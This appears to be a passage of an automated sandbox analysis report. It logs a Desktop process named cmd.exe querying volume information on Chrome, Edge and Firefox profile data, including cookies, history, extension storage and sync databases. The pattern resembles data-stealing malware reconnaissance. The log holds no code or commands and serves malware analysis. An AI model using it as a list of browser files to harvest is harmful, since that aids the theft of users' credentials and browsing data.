              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation
              Source: C:\Users\user\Desktop\cmd.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite VolumeInformation
